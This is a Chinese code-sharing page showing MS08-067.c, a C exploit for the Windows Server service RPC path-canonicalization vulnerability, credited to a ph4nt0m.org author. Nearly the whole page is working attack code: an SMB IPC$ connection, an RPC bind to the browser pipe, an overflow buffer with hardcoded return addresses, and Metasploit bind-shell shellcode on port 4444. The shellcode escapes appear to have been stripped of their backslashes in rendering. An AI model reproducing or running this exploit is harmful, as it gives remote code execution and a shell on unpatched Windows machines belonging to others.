开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 防火墙与安全工具 > 查看源码
MS08-067.c
资源名称:2008-MS08-067.rar [点击查看]
上传用户:fsojjn
上传日期:2015-10-05
资源大小:12k
文件大小:6k
源码类别:

防火墙与安全工具

开发平台:

Visual C++

MS08-067.c:源码内容
  1. #include <winsock2.h>
  2. #include <windows.h>
  3. #include <stdio.h>
  4. #include <io.h>
  5. #include <fcntl.h>
  6. #include <memory.h>
  7. #include <wchar.h>
  8. #include "srvsvc.h"
  9. #include "srvsvc_c.c"
  10. #include "mem.h"
  13. #pragma comment(lib,"ws2_32")
  14. #pragma comment(lib,"mpr")
  15. #pragma comment(lib,"rpcrt4.lib")
  16. #pragma comment(lib,"MSVCRT.LIB")
  18. DWORD dwRetAddr = 0x7ffa0eb8;
  19. DWORD dwJmpAddr = 0x7ffa0eb7;
  21. /* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
  22. unsigned char sc[] =
  23. "x83xECx70" // sub esp, 0x70
  24. "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xad"
  25. "x07xe6x4ax83xebxfcxe2xf4x51x6dx0dx07x45xfex19xb5"
  26. "x52x67x6dx26x89x23x6dx0fx91x8cx9ax4fxd5x06x09xc1"
  27. "xe2x1fx6dx15x8dx06x0dx03x26x33x6dx4bx43x36x26xd3"
  28. "x01x83x26x3exaaxc6x2cx47xacxc5x0dxbex96x53xc2x62"
  29. "xd8xe2x6dx15x89x06x0dx2cx26x0bxadxc1xf2x1bxe7xa1"
  30. "xaex2bx6dxc3xc1x23xfax2bx6ex36x3dx2ex26x44xd6xc1"
  31. "xedx0bx6dx3axb1xaax6dx0axa5x59x8exc4xe3x09x0ax1a"
  32. "x52xd1x80x19xcbx6fxd5x78xc5x70x95x78xf2x53x19x9a"
  33. "xc5xccx0bxb6x96x57x19x9cxf2x8ex03x2cx2cxeaxeex48"
  34. "xf8x6dxe4xb5x7dx6fx3fx43x58xaaxb1xb5x7bx54xb5x19"
  35. "xfex54xa5x19xeex54x19x9axcbx6fxf7x16xcbx54x6fxab"
  36. "x38x6fx42x50xddxc0xb1xb5x7bx6dxf6x1bxf8xf8x36x22"
  37. "x09xaaxc8xa3xfaxf8x30x19xf8xf8x36x22x48x4ex60x03"
  38. "xfaxf8x30x1axf9x53xb3xb5x7dx94x8exadxd4xc1x9fx1d"
  39. "x52xd1xb3xb5x7dx61x8cx2excbx6fx85x27x24xe2x8cx1a"
  40. "xf4x2ex2axc3x4ax6dxa2xc3x4fx36x26xb9x07xf9xa4x67"
  41. "x53x45xcaxd9x20x7dxdexe1x06xacx8ex38x53xb4xf0xb5"
  42. "xd8x43x19x9cxf6x50xb4x1bxfcx56x8cx4bxfcx56xb3x1b"
  43. "x52xd7x8exe7x74x02x28x19x52xd1x8cxb5x52x30x19x9a"
  44. "x26x50x1axc9x69x63x19x9cxffxf8x36x22x42xc9x06x2a"
  45. "xfexf8x30xb5x7dx07xe6x4a";
  48. int MakeBuff(char *Buff,int BufLen);
  49. void Usage(char *ProgName);
  50. int WaitExit();
  52. #define CN 0
  53. #define TW 1
  55. void main(int argc, char *argv[])
  56. {
  57. NETRESOURCE lpNetResource;
  58. char Username[256] = {0};
  59. char Password[256] = {0};
  60. DWORD Ret = 0;
  61. RPC_STATUS status;
  62. unsigned char * pszUuid = NULL;
  63. unsigned char * pszProtocolSequence = "ncacn_np";
  64. unsigned char * pszNetworkAddress = "";
  65. unsigned char pszEndpoint[100] = "\pipe\browser";
  66. unsigned char * pszOptions = NULL;
  67. unsigned char * pszStringBinding = NULL;
  69. char Server[256] = {0};
  70. char RemoteName[256] = {0};
  71. char Buff[0x700];
  72. char Buff2[1000] = {0};
  73. char *pBuff2 = (char *)&Buff2;
  74. char Buff3[100] = {0};
  75. int BufLen = 0;
  76. // int i;
  77. int ForceAttack = 0;
  78. int AntiDEP = 0;
  80. int nLanguage = 0;
  81. DWORD dwID = 0;
  83. if(argc != 2)
  84. {
  85. Usage(argv[0]);
  86. return;
  87. }
  89. strcpy(Server,argv[1]);
  90. sprintf(RemoteName,"\\%s\IPC$",Server);
  91. pszNetworkAddress = Server;
  94. if(strlen(Server) == 0)
  95. {
  96. Usage(argv[0]);
  97. return;
  98. }
  100. printf("nMS08-067 Exploit for CN by EMM@ph4nt0m.orgnn");
  102. lpNetResource.dwScope=RESOURCE_CONNECTED;
  103. lpNetResource.dwType =RESOURCETYPE_DISK;
  104. lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
  105. lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
  106. lpNetResource.lpLocalName=NULL;
  107. lpNetResource.lpRemoteName = RemoteName;
  108. lpNetResource.lpComment=NULL;
  109. lpNetResource.lpProvider=NULL;
  111. Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
  112. if(Ret != NO_ERROR)
  113. {
  114. printf("Make SMB Connection error:%dn",GetLastError());
  115. return;
  116. }
  118. printf("SMB Connect OK!n");
  120. status = RpcStringBindingCompose(pszUuid,
  121. pszProtocolSequence,
  122. pszNetworkAddress,
  123. pszEndpoint,
  124. pszOptions,
  125. &pszStringBinding);
  126. if(status != RPC_S_OK)
  127. {
  128. return;
  129. }
  130. status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
  131. if(status != RPC_S_OK)
  132. {
  133. return;
  134. }
  137.    RpcTryExcept
  138.     {
  140. func23(L"ph4nt0m",(wchar_t *)"x53x00x56x89x56x89x56x89x56x89",(wchar_t *)"x4Dx00x56x89x56x89",4,0);
  143. memset(Buff,0,sizeof(Buff));
  144. BufLen = MakeBuff(Buff,sizeof(Buff));
  146. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
  147. (DWORD)*(DWORD *)Buff3 = 1;
  148. func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);
  150.     }
  151.     RpcExcept ( 1 )
  152.     {
  153.         status = RpcExceptionCode();
  154. if(status == 1726)
  155. {
  156. }
  157. else
  158. {
  159. printf("RpcExceptionCode() = %urn", status );
  160. return;
  161. }
  162.     }
  163.     RpcEndExcept
  164. //*/
  165. printf("Maybe Patched!n");
  168.     RpcStringFree( &pszStringBinding );
  169.     RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
  170. return;
  171. }
  174. #define JMPPOINT "B041"
  175. int MakeBuff(char *Buff, int BufLen)
  176. {
  177. int len = 0;
  178. char tmp[5] = {0};
  179. int i;
  181. for(i = 0; i < BufLen/4; i++)
  182. {
  183. memset(tmp,0,4);
  184. sprintf(tmp,"B%03d",i);
  185. //*
  186. if(memcmp(tmp,JMPPOINT,4) == 0)
  187. {
  188. break;
  189. }
  190. //*/
  191. memcpy(Buff + len,tmp,4);
  192. len += 4;
  193. }
  195. memcpy(Buff,L".\\a\..\..\NN",13*2);
  197. for(i = 0; i < 6; i++)
  198. {
  199. memcpy(Buff + len,&dwRetAddr,4);
  200. len += 4;
  201. }
  203. memcpy(Buff + len,&dwJmpAddr,4);
  204. len += 4;
  205. memset(Buff + len,0x48,0x4);
  206. len += 4;
  208. memcpy(Buff + len,sc,sizeof(sc) - 1);
  209. len += sizeof(sc) - 1;
  211. memcpy(Buff + len,"EMM!",4);
  212. len += 4;
  214. memset(Buff + 0x206 * 2,0,2);
  215. return len;
  216. }
  218. void Usage(char *ProgName)
  219. {
  220. printf("n MS08-067 Exploit for CN by EMM@ph4nt0m.orgnn %s <Server>nn",ProgName);
  221. return;
  222. }
  224. int WaitExit()
  225. {
  226. Sleep(1000 * 5);
  227. printf("Send Payload Over!n");
  228. ExitProcess(0);
  229. return 0;
  230. }